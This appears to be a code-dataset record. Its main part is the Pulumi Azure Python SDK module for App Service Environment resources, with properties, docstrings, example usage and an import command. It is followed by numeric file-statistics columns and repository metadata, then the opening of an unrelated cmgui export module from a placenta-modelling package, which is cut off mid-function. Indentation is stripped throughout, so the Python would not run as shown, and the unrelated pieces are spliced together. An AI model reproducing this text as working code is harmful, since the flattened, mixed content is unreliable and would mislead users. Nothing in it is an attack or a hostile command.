def internal_load_balancing_mode(self) -> Optional[pulumi.Input[str]]:
"""
Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None`, `Web`, `Publishing` and combined value `"Web, Publishing"`. Defaults to `None`.
"""
return pulumi.get(self, "internal_load_balancing_mode")
@internal_load_balancing_mode.setter
def internal_load_balancing_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internal_load_balancing_mode", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the App Service Environment. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="pricingTier")
def pricing_tier(self) -> Optional[pulumi.Input[str]]:
"""
Pricing tier for the front end instances. Possible values are `I1`, `I2` and `I3`. Defaults to `I1`.
"""
return pulumi.get(self, "pricing_tier")
@pricing_tier.setter
def pricing_tier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "pricing_tier", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="userWhitelistedIpRanges")
def user_whitelisted_ip_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "user_whitelisted_ip_ranges")
@user_whitelisted_ip_ranges.setter
def user_whitelisted_ip_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "user_whitelisted_ip_ranges", value)
@pulumi.input_type
class _EnvironmentState:
def __init__(__self__, *,
allowed_user_ip_cidrs: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]]] = None,
front_end_scale_factor: Optional[pulumi.Input[int]] = None,
internal_ip_address: Optional[pulumi.Input[str]] = None,
internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
outbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
pricing_tier: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
service_ip_address: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
user_whitelisted_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering Environment resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_user_ip_cidrs: Allowed user added IP ranges on the ASE database. Use the addresses you want to set as the explicit egress address ranges.
:param pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
:param pulumi.Input[int] front_end_scale_factor: Scale factor for front end instances. Possible values are between `5` and `15`. Defaults to `15`.
:param pulumi.Input[str] internal_ip_address: IP address of internal load balancer of the App Service Environment.
:param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None`, `Web`, `Publishing` and combined value `"Web, Publishing"`. Defaults to `None`.
:param pulumi.Input[str] location: The location where the App Service Environment exists.
:param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] outbound_ip_addresses: List of outbound IP addresses of the App Service Environment.
:param pulumi.Input[str] pricing_tier: Pricing tier for the front end instances. Possible values are `I1`, `I2` and `I3`. Defaults to `I1`.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
:param pulumi.Input[str] service_ip_address: IP address of service endpoint of the App Service Environment.
:param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
if allowed_user_ip_cidrs is not None:
pulumi.set(__self__, "allowed_user_ip_cidrs", allowed_user_ip_cidrs)
if cluster_settings is not None:
pulumi.set(__self__, "cluster_settings", cluster_settings)
if front_end_scale_factor is not None:
pulumi.set(__self__, "front_end_scale_factor", front_end_scale_factor)
if internal_ip_address is not None:
pulumi.set(__self__, "internal_ip_address", internal_ip_address)
if internal_load_balancing_mode is not None:
pulumi.set(__self__, "internal_load_balancing_mode", internal_load_balancing_mode)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if outbound_ip_addresses is not None:
pulumi.set(__self__, "outbound_ip_addresses", outbound_ip_addresses)
if pricing_tier is not None:
pulumi.set(__self__, "pricing_tier", pricing_tier)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if service_ip_address is not None:
pulumi.set(__self__, "service_ip_address", service_ip_address)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if user_whitelisted_ip_ranges is not None:
    warnings.warn("""this property has been renamed to `allowed_user_ip_cidrs` to better reflect the expected IP range format""", DeprecationWarning)
    pulumi.log.warn("""user_whitelisted_ip_ranges is deprecated: this property has been renamed to `allowed_user_ip_cidrs` to better reflect the expected IP range format""")
    pulumi.set(__self__, "user_whitelisted_ip_ranges", user_whitelisted_ip_ranges)
@property
@pulumi.getter(name="allowedUserIpCidrs")
def allowed_user_ip_cidrs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Allowed user added IP ranges on the ASE database. Use the addresses you want to set as the explicit egress address ranges.
"""
return pulumi.get(self, "allowed_user_ip_cidrs")
@allowed_user_ip_cidrs.setter
def allowed_user_ip_cidrs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allowed_user_ip_cidrs", value)
@property
@pulumi.getter(name="clusterSettings")
def cluster_settings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]]]:
"""
Zero or more `cluster_setting` blocks as defined below.
"""
return pulumi.get(self, "cluster_settings")
@cluster_settings.setter
def cluster_settings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]]]):
pulumi.set(self, "cluster_settings", value)
@property
@pulumi.getter(name="frontEndScaleFactor")
def front_end_scale_factor(self) -> Optional[pulumi.Input[int]]:
"""
Scale factor for front end instances. Possible values are between `5` and `15`. Defaults to `15`.
"""
return pulumi.get(self, "front_end_scale_factor")
@front_end_scale_factor.setter
def front_end_scale_factor(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "front_end_scale_factor", value)
@property
@pulumi.getter(name="internalIpAddress")
def internal_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
IP address of internal load balancer of the App Service Environment.
"""
return pulumi.get(self, "internal_ip_address")
@internal_ip_address.setter
def internal_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internal_ip_address", value)
@property
@pulumi.getter(name="internalLoadBalancingMode")
def internal_load_balancing_mode(self) -> Optional[pulumi.Input[str]]:
"""
Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None`, `Web`, `Publishing` and combined value `"Web, Publishing"`. Defaults to `None`.
"""
return pulumi.get(self, "internal_load_balancing_mode")
@internal_load_balancing_mode.setter
def internal_load_balancing_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internal_load_balancing_mode", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location where the App Service Environment exists.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the App Service Environment. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="outboundIpAddresses")
def outbound_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of outbound IP addresses of the App Service Environment.
"""
return pulumi.get(self, "outbound_ip_addresses")
@outbound_ip_addresses.setter
def outbound_ip_addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "outbound_ip_addresses", value)
@property
@pulumi.getter(name="pricingTier")
def pricing_tier(self) -> Optional[pulumi.Input[str]]:
"""
Pricing tier for the front end instances. Possible values are `I1`, `I2` and `I3`. Defaults to `I1`.
"""
return pulumi.get(self, "pricing_tier")
@pricing_tier.setter
def pricing_tier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "pricing_tier", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="serviceIpAddress")
def service_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
IP address of service endpoint of the App Service Environment.
"""
return pulumi.get(self, "service_ip_address")
@service_ip_address.setter
def service_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_ip_address", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="userWhitelistedIpRanges")
def user_whitelisted_ip_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "user_whitelisted_ip_ranges")
@user_whitelisted_ip_ranges.setter
def user_whitelisted_ip_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "user_whitelisted_ip_ranges", value)
class Environment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
allowed_user_ip_cidrs: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentClusterSettingArgs']]]]] = None,
front_end_scale_factor: Optional[pulumi.Input[int]] = None,
internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pricing_tier: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
user_whitelisted_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages an App Service Environment.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
address_spaces=["10.0.0.0/16"])
ase = azure.network.Subnet("ase",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["10.0.1.0/24"])
gateway = azure.network.Subnet("gateway",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["10.0.2.0/24"])
example_environment = azure.appservice.Environment("exampleEnvironment",
subnet_id=ase.id,
pricing_tier="I2",
front_end_scale_factor=10,
internal_load_balancing_mode="Web, Publishing",
allowed_user_ip_cidrs=[
"11.22.33.44/32",
"55.66.77.0/24",
],
cluster_settings=[azure.appservice.EnvironmentClusterSettingArgs(
name="DisableTls1.0",
value="1",
)])
```
## Import
The App Service Environment can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:appservice/environment:Environment myAppServiceEnv /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myResourceGroup/providers/Microsoft.Web/hostingEnvironments/myAppServiceEnv
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_user_ip_cidrs: Allowed user added IP ranges on the ASE database. Use the addresses you want to set as the explicit egress address ranges.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentClusterSettingArgs']]]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
:param pulumi.Input[int] front_end_scale_factor: Scale factor for front end instances. Possible values are between `5` and `15`. Defaults to `15`.
:param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None`, `Web`, `Publishing` and combined value `"Web, Publishing"`. Defaults to `None`.
:param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
:param pulumi.Input[str] pricing_tier: Pricing tier for the front end instances. Possible values are `I1`, `I2` and `I3`. Defaults to `I1`.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
:param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: EnvironmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an App Service Environment.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
address_spaces=["10.0.0.0/16"])
ase = azure.network.Subnet("ase",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["10.0.1.0/24"])
gateway = azure.network.Subnet("gateway",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["10.0.2.0/24"])
example_environment = azure.appservice.Environment("exampleEnvironment",
subnet_id=ase.id,
pricing_tier="I2",
front_end_scale_factor=10,
internal_load_balancing_mode="Web, Publishing",
allowed_user_ip_cidrs=[
"11.22.33.44/32",
"55.66.77.0/24",
],
cluster_settings=[azure.appservice.EnvironmentClusterSettingArgs(
name="DisableTls1.0",
value="1",
)])
```
## Import
The App Service Environment can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:appservice/environment:Environment myAppServiceEnv /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myResourceGroup/providers/Microsoft.Web/hostingEnvironments/myAppServiceEnv
```
:param str resource_name: The name of the resource.
:param EnvironmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(EnvironmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
allowed_user_ip_cidrs: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentClusterSettingArgs']]]]] = None,
front_end_scale_factor: Optional[pulumi.Input[int]] = None,
internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pricing_tier: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
user_whitelisted_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = EnvironmentArgs.__new__(EnvironmentArgs)
__props__.__dict__["allowed_user_ip_cidrs"] = allowed_user_ip_cidrs
__props__.__dict__["cluster_settings"] = cluster_settings
__props__.__dict__["front_end_scale_factor"] = front_end_scale_factor
__props__.__dict__["internal_load_balancing_mode"] = internal_load_balancing_mode
__props__.__dict__["name"] = name
__props__.__dict__["pricing_tier"] = pricing_tier
__props__.__dict__["resource_group_name"] = resource_group_name
if subnet_id is None and not opts.urn:
raise TypeError("Missing required property 'subnet_id'")
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["tags"] = tags
if user_whitelisted_ip_ranges is not None and not opts.urn:
warnings.warn("""this property has been renamed to `allowed_user_ip_cidrs` better reflect the expected ip range format""", DeprecationWarning)
pulumi.log.warn("""user_whitelisted_ip_ranges is deprecated: this property has been renamed to `allowed_user_ip_cidrs` better reflect the expected ip range format""")
__props__.__dict__["user_whitelisted_ip_ranges"] = user_whitelisted_ip_ranges
__props__.__dict__["internal_ip_address"] = None
__props__.__dict__["location"] = None
__props__.__dict__["outbound_ip_addresses"] = None
__props__.__dict__["service_ip_address"] = None
super(Environment, __self__).__init__(
'azure:appservice/environment:Environment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
allowed_user_ip_cidrs: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentClusterSettingArgs']]]]] = None,
front_end_scale_factor: Optional[pulumi.Input[int]] = None,
internal_ip_address: Optional[pulumi.Input[str]] = None,
internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
outbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
pricing_tier: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
service_ip_address: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
user_whitelisted_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'Environment':
"""
Get an existing Environment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_user_ip_cidrs: Allowed user added IP ranges on the ASE database. Use the addresses you want to set as the explicit egress address ranges.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentClusterSettingArgs']]]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
:param pulumi.Input[int] front_end_scale_factor: Scale factor for front end instances. Possible values are between `5` and `15`. Defaults to `15`.
:param pulumi.Input[str] internal_ip_address: IP address of internal load balancer of the App Service Environment.
:param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None`, `Web`, `Publishing` and combined value `"Web, Publishing"`. Defaults to `None`.
:param pulumi.Input[str] location: The location where the App Service Environment exists.
:param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] outbound_ip_addresses: List of outbound IP addresses of the App Service Environment.
:param pulumi.Input[str] pricing_tier: Pricing tier for the front end instances. Possible values are `I1`, `I2` and `I3`. Defaults to `I1`.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
:param pulumi.Input[str] service_ip_address: IP address of service endpoint of the App Service Environment.
:param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _EnvironmentState.__new__(_EnvironmentState)
__props__.__dict__["allowed_user_ip_cidrs"] = allowed_user_ip_cidrs
__props__.__dict__["cluster_settings"] = cluster_settings
__props__.__dict__["front_end_scale_factor"] = front_end_scale_factor
__props__.__dict__["internal_ip_address"] = internal_ip_address
__props__.__dict__["internal_load_balancing_mode"] = internal_load_balancing_mode
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["outbound_ip_addresses"] = outbound_ip_addresses
__props__.__dict__["pricing_tier"] = pricing_tier
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["service_ip_address"] = service_ip_address
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["tags"] = tags
__props__.__dict__["user_whitelisted_ip_ranges"] = user_whitelisted_ip_ranges
return Environment(resource_name, opts=opts, __props__=__props__)
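    # Lookup sketch (placeholder resource ID): adopt an existing App Service Environment
    # and export one of its read-only outputs.
    #
    #     ase = Environment.get(
    #         "existing-ase",
    #         id="/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myResourceGroup"
    #            "/providers/Microsoft.Web/hostingEnvironments/myAppServiceEnv")
    #     pulumi.export("aseOutboundIps", ase.outbound_ip_addresses)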
@property
@pulumi.getter(name="allowedUserIpCidrs")
def allowed_user_ip_cidrs(self) -> pulumi.Output[Sequence[str]]:
"""
Allowed user added IP ranges on the ASE database. Use the addresses you want to set as the explicit egress address ranges.
"""
return pulumi.get(self, "allowed_user_ip_cidrs")
@property
@pulumi.getter(name="clusterSettings")
def cluster_settings(self) -> pulumi.Output[Sequence['outputs.EnvironmentClusterSetting']]:
"""
Zero or more `cluster_setting` blocks as defined below.
"""
return pulumi.get(self, "cluster_settings")
@property
@pulumi.getter(name="frontEndScaleFactor")
def front_end_scale_factor(self) -> pulumi.Output[Optional[int]]:
"""
Scale factor for front end instances. Possible values are between `5` and `15`. Defaults to `15`.
"""
return pulumi.get(self, "front_end_scale_factor")
@property
@pulumi.getter(name="internalIpAddress")
def internal_ip_address(self) -> pulumi.Output[str]:
"""
IP address of internal load balancer of the App Service Environment.
"""
return pulumi.get(self, "internal_ip_address")
@property
@pulumi.getter(name="internalLoadBalancingMode")
def internal_load_balancing_mode(self) -> pulumi.Output[Optional[str]]:
"""
Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None`, `Web`, `Publishing` and combined value `"Web, Publishing"`. Defaults to `None`.
"""
return pulumi.get(self, "internal_load_balancing_mode")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The location where the App Service Environment exists.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the App Service Environment. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="outboundIpAddresses")
def outbound_ip_addresses(self) -> pulumi.Output[Sequence[str]]:
"""
List of outbound IP addresses of the App Service Environment.
"""
return pulumi.get(self, "outbound_ip_addresses")
@property
@pulumi.getter(name="pricingTier")
def pricing_tier(self) -> pulumi.Output[Optional[str]]:
"""
Pricing tier for the front end instances. Possible values are `I1`, `I2` and `I3`. Defaults to `I1`.
"""
return pulumi.get(self, "pricing_tier")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="serviceIpAddress")
def service_ip_address(self) -> pulumi.Output[str]:
"""
IP address of service endpoint of the App Service Environment.
"""
return pulumi.get(self, "service_ip_address")
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> pulumi.Output[str]:
"""
The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="userWhitelistedIpRanges")
def user_whitelisted_ip_ranges(self) -> pulumi.Output[Sequence[str]]:
return pulumi.get(self, "user_whitelisted_ip_ranges")
| 53.201044
| 272
| 0.682519
| 5,027
| 40,752
| 5.290233
| 0.053909
| 0.086034
| 0.066331
| 0.044672
| 0.927841
| 0.911672
| 0.89915
| 0.888697
| 0.880838
| 0.869031
| 0
| 0.006907
| 0.218345
| 40,752
| 765
| 273
| 53.270588
| 0.827965
| 0.361626
| 0
| 0.772834
| 1
| 0
| 0.151675
| 0.070275
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161593
| false
| 0.002342
| 0.016393
| 0.007026
| 0.276347
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d497575f2404b78e5fde26a84c95325498aeb250
| 41,007
|
py
|
Python
|
source/placentagen/imports_and_exports.py
|
VirtualPregnancy/placentagen
|
08c0731a6cf21a451384450e355254492f8d43b1
|
[
"Apache-2.0"
] | 2
|
2019-06-11T21:35:54.000Z
|
2022-03-10T01:53:43.000Z
|
source/placentagen/imports_and_exports.py
|
alysclark/placentagen
|
bccae1eb73b760a358ea991be27de5c15c2420b6
|
[
"Apache-2.0"
] | 31
|
2018-03-14T01:43:19.000Z
|
2020-07-23T21:23:27.000Z
|
source/placentagen/imports_and_exports.py
|
VirtualPregnancy/placentagen
|
08c0731a6cf21a451384450e355254492f8d43b1
|
[
"Apache-2.0"
] | 6
|
2018-04-29T23:42:48.000Z
|
2021-09-14T01:33:53.000Z
|
#!/usr/bin/env python
import numpy as np
from . import pg_utilities
import warnings
import skimage
from skimage import io
def export_ex_coords(data, groupname, filename, type):
# Exports coordinates to exnode or exdata format
# data = array of node coordinates (3 columns, or 4 with node numbers in the first column)
# groupname = what you want your data to be called in cmgui
# filename = file name without extension
# type = exnode or exdata
print('filename', filename)
data_length = len(data[0])  # 3 columns: nodes/data are numbered automatically; 4 columns: node numbers are given as the first entry
data_num = len(data)
filename = filename + '.' + type
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" #Fields=1\n")
f.write(" 1) coordinates, coordinate, rectangular cartesian, #Components=3\n")
f.write(" x. Value index=1, #Derivatives=0\n")
f.write(" y. Value index=1, #Derivatives=0\n")
f.write(" z. Value index=1, #Derivatives=0\n")
for x in range(0, data_num):
    if data_length == 4:  # explicit node numbers in the first column
        f.write("Node: %s\n" % int(data[x][0] + 1))
        f.write(" %s\n" % data[x][1])
        f.write(" %s\n" % data[x][2])
        f.write(" %s\n" % data[x][3])
    else:  # number the nodes sequentially from 1
        f.write("Node: %s\n" % (x + 1))
        f.write(" %s\n" % data[x][0])
        f.write(" %s\n" % data[x][1])
        f.write(" %s\n" % data[x][2])
f.close()
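# Usage sketch (hypothetical data): writes three automatically numbered nodes to `tree.exnode`.
# A fourth leading column would instead be read as explicit node numbers.
#
#     coords = np.array([[0., 0., 0.], [0., 0., 1.], [0., 1., 1.]])
#     export_ex_coords(coords, 'tree', 'tree', 'exnode')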
def export_ex_field(data, groupname, fieldname, filename, type):
# Exports a field to exnode or exdata format
# data = array of field values, one per node
# groupname = what you want your data to be called in cmgui
# fieldname = name of the field as it will appear in cmgui
# filename = file name without extension
# type = exnode or exdata
data_num = len(data)
filename = filename + '.' + type
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" #Fields=1\n")
f.write(" 1) %s, coordinate, rectangular cartesian, #Components=1\n" % fieldname)
f.write(" %s. Value index=1, #Derivatives=0\n" % fieldname)
for x in range(0, data_num):
f.write("Node: " "%s\n" % (x + 1))
f.write(" %s\n" % data[x])
f.close()
def export_nodal_rad_field(data, groupname, fieldname, filename, type, nodes, elems):
